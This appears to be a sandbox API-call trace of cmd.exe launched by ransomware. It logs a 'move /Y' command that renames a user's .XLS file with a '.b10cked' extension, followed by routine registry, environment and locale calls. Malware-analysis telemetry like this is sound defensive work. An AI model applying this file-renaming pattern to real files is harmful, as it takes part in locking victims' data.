0x81c Process: id = "80" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0x508" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10363 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10364 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10365 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10366 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10367 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10368 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10369 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10370 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10371 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10372 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10393 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10394 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10395 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10396 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10397 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10398 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10399 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10400 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10401 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10402 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10403 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10404 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10405 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10406 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10407 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 10408 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10409 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10410 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10411 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10412 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10413 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10414 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10415 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 10416 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 137 os_tid = 0x82c [0127.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af894 | out: lpSystemTimeAsFileTime=0x1af894*(dwLowDateTime=0x8611b0c0, dwHighDateTime=0x1d440a9)) [0127.734] GetCurrentProcessId () returned 0x508 [0127.734] GetCurrentThreadId () returned 0x82c [0127.734] GetTickCount () returned 0x28fdf [0127.734] QueryPerformanceCounter (in: lpPerformanceCount=0x1af88c | out: lpPerformanceCount=0x1af88c*=18452548285) returned 1 [0127.737] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.737] __set_app_type (_Type=0x1) [0127.737] __p__fmode () returned 0x76b331f4 [0127.737] __p__commode () returned 0x76b331fc [0127.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.737] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.737] GetCurrentThreadId () returned 0x82c [0127.738] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x82c) returned 0x38 [0127.738] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.738] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.738] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.738] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af824 | out: phkResult=0x1af824*=0x0) returned 0x2 [0127.738] VirtualQuery (in: lpAddress=0x1af85b, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.738] GetConsoleOutputCP () returned 0x1b5 [0127.738] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.738] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.738] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.738] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.739] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.739] GetEnvironmentStringsW () returned 0x300240* [0127.740] FreeEnvironmentStringsW (penv=0x300240) returned 1 [0127.740] GetEnvironmentStringsW () returned 0x300240* [0127.740] FreeEnvironmentStringsW (penv=0x300240) returned 1 [0127.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae794 | out: phkResult=0x1ae794*=0x40) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0xf0, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x0, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegCloseKey (hKey=0x40) returned 0x0 [0127.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae794 | out: phkResult=0x1ae794*=0x40) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x0, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.741] RegCloseKey (hKey=0x40) returned 0x0 [0127.741] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.741] srand (_Seed=0x5b886362) [0127.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" [0127.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" [0127.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.741] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3019a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.742] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.742] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.742] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.742] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.742] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.742] GetEnvironmentStringsW () returned 0x302390* [0127.742] FreeEnvironmentStringsW (penv=0x302390) returned 1 [0127.742] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.742] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.742] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.742] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.743] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.743] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.743] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af560 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af560, lpFilePart=0x1af55c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af55c*="Desktop") returned 0x18 [0127.743] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.744] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.744] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.744] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.744] GetEnvironmentStringsW () returned 0x302bb0* [0127.744] FreeEnvironmentStringsW (penv=0x302bb0) returned 1 [0127.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.744] GetConsoleOutputCP () returned 0x1b5 [0127.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.745] GetUserDefaultLCID () returned 0x409 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af6a0, cchData=128 | out: lpLCData="0") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af6a0, cchData=128 | out: lpLCData="0") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af6a0, cchData=128 | out: lpLCData="1") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.746] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.747] GetConsoleTitleW (in: lpConsoleTitle=0x2f0958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.748] _wcsicmp (_String1="move", _String2=")") returned 68 [0127.748] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0127.748] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0127.748] _wcsicmp (_String1="IF", _String2="move") returned -4 [0127.748] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0127.748] _wcsicmp (_String1="REM", _String2="move") returned 5 [0127.748] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0127.752] GetConsoleTitleW (in: lpConsoleTitle=0x1af398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.847] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0127.847] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0127.847] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0127.847] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0127.847] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0127.847] _wcsicmp (_String1="move", _String2="CD") returned 10 [0127.847] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0127.847] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0127.847] _wcsicmp (_String1="move", _String2="REN") returned -5 [0127.847] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0127.847] _wcsicmp (_String1="move", _String2="SET") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0127.848] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0127.848] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="MD") returned 11 [0127.848] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0127.848] _wcsicmp (_String1="move", _String2="RD") returned -5 [0127.848] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0127.848] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0127.848] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0127.848] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0127.848] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="VER") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0127.848] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0127.848] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0127.848] _wcsicmp (_String1="move", _String2="START") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0127.848] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0127.848] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0127.850] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.850] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af154, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af14c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af14c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 